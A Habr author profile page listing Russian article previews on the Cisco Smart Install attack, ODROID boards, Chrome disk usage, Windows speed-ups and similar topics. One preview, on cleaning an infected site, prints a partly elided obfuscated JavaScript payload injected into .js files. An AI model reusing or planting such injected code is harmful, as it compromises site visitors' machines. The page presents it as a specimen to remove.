Pull to refresh
38
0
Георгий Оганисян @Grox

Full Stack Web Developer

Send message

Проверяй входящие данные. Исходная причина уязвимости и атаки на Cisco IOS

Reading time 2 min
Views 13K
Cisco IOS function weak

В пятницу 6 апреля 2018 началась мощная атака на оборудование Cisco.

Много пишут о том, что главная причина, по которой эта атака успешна, это открытые во внешние сети сервисные порты Cisco Smart Install.

Эти порты открыты по умолчанию. А люди в массе своей оставляют то, что сконфигурировано/выбрано/настроено таким, каким оно было по умолчанию. Как видим, на примере этого случая, это касается не только домашних роутеров, но и серьёзного оборудования в крупных компаниях, где цена ошибки значительно выше.

При создании системы вы не имеете права расчитывать на то, что значения по умолчанию, которые следует изменить будут изменены, причём в нужную сторону.

Вы лишь можете заставить изменить эти значения с помощью каких либо ограничивающих использование приёмов. Чему многие будут не рады. «Защита от дурака» это один из примеров этих обязывающих ограничений.

Про выбор по умолчанию
Есть исследование 2003 года «Спасает ли жизни выбор по умолчанию?», в котором есть диаграмма

image

На русском подробнее.
В ней видно, что число тех, кто готов участвовать в программе донорства органов сильно зависит от того, какой выбор по умолчанию уже сделан в медицинской анкете.

Я хочу обратить внимание на корень самой уязвимости. В отчёте есть такая часть:
Читать дальше →
Total votes 28: ↑27 and ↓1 +26
Comments 45

ODROID-C1 — форма от Raspberry Pi B+, 4 ядра по 1500MHz, 1GB и цена $35

Reading time 2 min
Views 37K
Корейские ребята из компании Жёсткоеядрышко (Hardkernel) выпустили в жизнь свой новый микрокомпьютер ODROID-C1, который сделан по подобию Raspberry Pi B+ в том же формфакторе и с тем же разъёмом GPIO. При этом, он обладает четырёхядерным процессором Cortex-A5 с частотой 1,5GHz, 1GB DDR3, гигабитной сетевой картой и прочими прелестями, которые заметно превосходят возможности малинки.

image

Немного предыстории


Ещё до этого Hardkernel выпустила ODROID-W, который имел тот же процессор от Broadcom, что и малинка, был программно совместим, а главным отличием были значительно меньшие размеры платы, особенно в высоту. Но ребятам, которые пекут малиновые пироги, это не понравилось и Broadcom запретила продавать Hardkernel свои процессоры. Была выпущена только одна партия ODROID-W. Её анонсировали в июле, а уже в сентябре появилось сообщение об отказе Broadcom в поставках.

Теперь же, Raspberry Pi B+ получил серьёзного конкурента, и хотя корейский вариант и менее известен, но он хорошо подходит тем, кому, как минимум, нужно больше производительности.

Сравнение и подробности
Total votes 29: ↑29 and ↓0 +29
Comments 70

Как дорого обходится Google Chrome для вашего SSD?

Reading time 1 min
Views 85K
Эта информация относится к любому типу носителя, не только SSD, просто его я беру для примера, так как у него относительно высокая стоимость хранения информации.



Возможно, вы уже знаете, что Google Chrome хранит свои предыдущие версии у вас на диске. Как вы думаете, сколько именно версий он хранит?

У вас есть возможность принять участие в двух опросах и сравнить ваши ожидания и реальность.
Сравнить аппетиты
Total votes 98: ↑40 and ↓58 -18
Comments 122

Лечение сайта от вируса в файлах javascript и других на примере

Reading time 3 min
Views 8.3K
Однажды, я получил письмо от Яндекс.Вебмастер о том, что один из моих сайтов заражён — Сайт содержит код, который может быть опасен для посетителей и, что В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Быстрый анализ показал, что заражены файлы *.js — в конце каждого из них был добавлен код:

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54
.... тут ещё много таких же надписей ....
$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}


Проанализировав выдачу поисковика на тему поиска и замены текста в файлах linux, я получил несколько вариантов команд для консоли.

Далее, я зашёл в систему по SSH и от имени root выполнил команду
Читать дальше →
Total votes 24: ↑8 and ↓16 -8
Comments 34

Блицкриг на рынке планшетов. Как мог взлететь HP WebOS или призрачный шанс для RIM и ...?

Reading time 3 min
Views 1.8K
Сейчас в очевидных лидерах на рынке планшетов находится Apple. И судя по желаниям американцев и тому, что я слышу лично, чтобы серьёзно потеснить Apple нужно сильно постараться.

Кому имеет смысл это делать? Тому, кто единолично контролирует рынок своих планшетов. Именно в такой ситуации можно получить полную отдачу от приведённого способа, такую, как сейчас имеет Apple с iPad. Какой это путь и почему он не подходит для производителей планшетов на Android
HP TouchPad by iSuppli

читайте под катом
Total votes 24: ↑19 and ↓5 +14
Comments 40

У вас 2-3 HDD? Ускорим загрузку и реакцию Windows и программ

Reading time 4 min
Views 27K
Когда компьютер со всем набором программ в автозагрузке стал грузится 4 минуты я подумал о том, чтобы всё это ускорить.
У меня стояла Windows XP и расширение Астер, которое позволяет работать за компьютером вдвоём, поэтому часть программ и сервисов грузилась в двойном экземпляре.

Однажды у меня появился третий винчестер и стало хватать места, чтобы перераспределить разделы на винчестерах в более удобный вариант и я решил, что можно подготовить 3 первых раздела на разных винчестерах и раскидать по ним системные папки.

Метод ускорения для Windows XP при наличии трёх винчестеров:

1. Переносим папки «Documents and Settings» и «Program Files» на первые разделы других винчестеров. Таким образом, на загрузочном диске из основных папок у нас остаётся только папка «Windows»
2. Создаём на диске с «Windows» ссылки файловой системы (junction-link) на перенесённые папки. Подробнее будет ниже.

Получается, что папки «Windows», «Documents and Settings» и «Program Files» находятся на разных винчестерах.
Что это нам даёт?
Total votes 97: ↑58 and ↓39 +19
Comments 152

Эмоции, как критерий для динамической подстройки результатов выдачи в поиске

Reading time 2 min
Views 1.1K
Изменяется ли ваше эмоциональное состояние, если вы не можете найти то, что вам нужно?
Я предполагаю, что обычно люди начинают проявлять нервозность и характерные для неё торопливость и резкость, их запросы меняются и…

Эта идея зрела давно и окончательно оформилась, когда мне показали цитату с баша, с которой и началась эта статья:
история одного поиска в Google:
Total votes 31: ↑20 and ↓11 +9
Comments 27

Оптимизация работы тех.поддержки. Карма пользователя

Reading time 2 min
Views 6.5K
Основная идея — это дать возможность операторам тех.поддержки оставлять пользователю оценку.
Это раскрывает широкие возможности по оптимизации работы и ускорению обслуживания обращений.

Многие среди нас являются тех.специалистами и готовы быстро и чётко сформулировать вопрос или сообщить об ошибке в деталях. Но чаще всего мы вынуждены проходить все этапы обращения в службу поддержки.

Мы все привыкли к тому, что многие компании просят оценить работу специалистов тех.поддержки после окончания разговора. Но, что если оператор тоже будет ставить оценку? Давайте оставим пока в стороне компетенцию самих операторов и посмотрим, какие возможности несёт система, которая это позволяет.
Прыгаем через уровни тех.поддержки
Total votes 46: ↑43 and ↓3 +40
Comments 50

Гироскоп в смартфоне откроет окно в новое измерение

Reading time 2 min
Views 3.9K
Гироскоп

Гироскоп в iPhone 4 принесёт новую революцию. На мой взгляд, это самое важное из того, что в нём есть. Остальные моменты не столь интересны. Они так или иначе уже давно есть в других смартах. А отличный корпус и экран это очень приятно, но не открытие.

Окно в другой мир


Представьте себе, вы запускаете приложение на смартфоне и его экран становится для вас окном в другой мир.

Например это 3D игра.
Вы просто перемещаете смартфон для того, чтобы увидеть другие стороны того света. Вы поднимаете его вверх и видите небо. Опускаете внизу и видите землю. Вертите по сторонам, чтобы осмотреться.
Что ещё несут на 6 степеней свободы!
Total votes 70: ↑35 and ↓35 0
Comments 128

Очевидные изобретения, которых все ждут, но их не продают

Reading time 6 min
Views 2.4K
Каждый из нас вероятно заглядывает в будущее и видит там, то, чего ему сейчас не хватает. И иногда не понимает, почему то, что давно можно было бы сделать и продавать, до сих пор не сделано.
Notion Ink Adam
Некоторые примеры:
  • Нетбук
  • iPhone
  • Планшеты, смартбуки, MID
  • Девайс с картинки

Про нетбуки

Я мечтал о лёгком и маленьком ноутбуке очень давно. Наверное года с 2000-го. Ещё до этого, я прочёл о Toshiba Libretto в Компьютерре. Подробнее именно о нём можно почитать на хабре: Как раньше ноутбуки делали — Toshiba Libretto 50ct (1997 г.в.)
И всё думал, ну почему же никто не выпустит маленький и недорогой ноутбук со слабеньким процессором, но чтобы долго работал.
Я думал, чего же Интел не сделает Pentium I 600-1000 MHz, ведь это наверняка будет маленькое ядро и низкое энергопотребление. Это всё должно быть не дорого, ибо оно же всё из простых комплектующих.
Читать дальше →
Total votes 113: ↑79 and ↓34 +45
Comments 119

Руль, как подарок. Logitech Driving Force GT

Reading time 4 min
Views 20K
Было у меня желание, купить себе хороший руль, но долгое время было что-то, что имело больший приоритет и руль у меня появился только сейчас и почти чудом.
image
Под катом, небольшой обзор Logitech Driving Force GT (за 1990 руб!)
Читать дальше →
Total votes 12: ↑8 and ↓4 +4
Comments 12

Information

Rating
Does not participate
Location
Москва, Москва и Московская обл., Россия
Date of birth
Registered
Activity